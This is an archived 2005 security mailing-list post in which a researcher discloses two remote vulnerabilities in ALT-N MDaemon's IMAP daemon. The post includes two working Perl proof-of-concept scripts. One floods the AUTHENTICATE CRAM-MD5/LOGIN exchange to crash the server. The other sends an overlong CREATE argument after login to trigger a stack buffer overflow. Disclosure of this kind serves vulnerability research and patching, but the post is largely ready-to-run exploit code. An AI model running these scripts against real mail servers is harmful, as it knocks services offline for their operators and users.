lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue Jul 19 00:02:54 2005
From: kingcope at gmx.net (kcope)
Subject: ALT-N MDaemon multiple vulnerabilities

Hello this is kcope,

there are two remote vulnerabilities in the latest ALT-N MDaemon imapd 
product
i don't know if any of them is exploitable .. the stack based buffer 
overflow
seems promising, but it's not preauth so i didn't investigate it further.

1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
2.) Remote stack based buffer overflow after authentication in the imap 
CREATE statement

---snip---
###
### MDAEMON remote DoS exploit by kcope
### looks like there?s a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###

use IO::Socket::INET;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '143',
                              Proto    => 'tcp');

$a = "q" x 1000;

print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";

while (<$sock>) {
    print $_;    
}
---snip---


---snip---
### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '143',
                              Proto    => 'tcp');

$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;

print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";

while (<$sock>) {
    print $_;    
}
---snip---

-kcope


Powered by blists - more mailing lists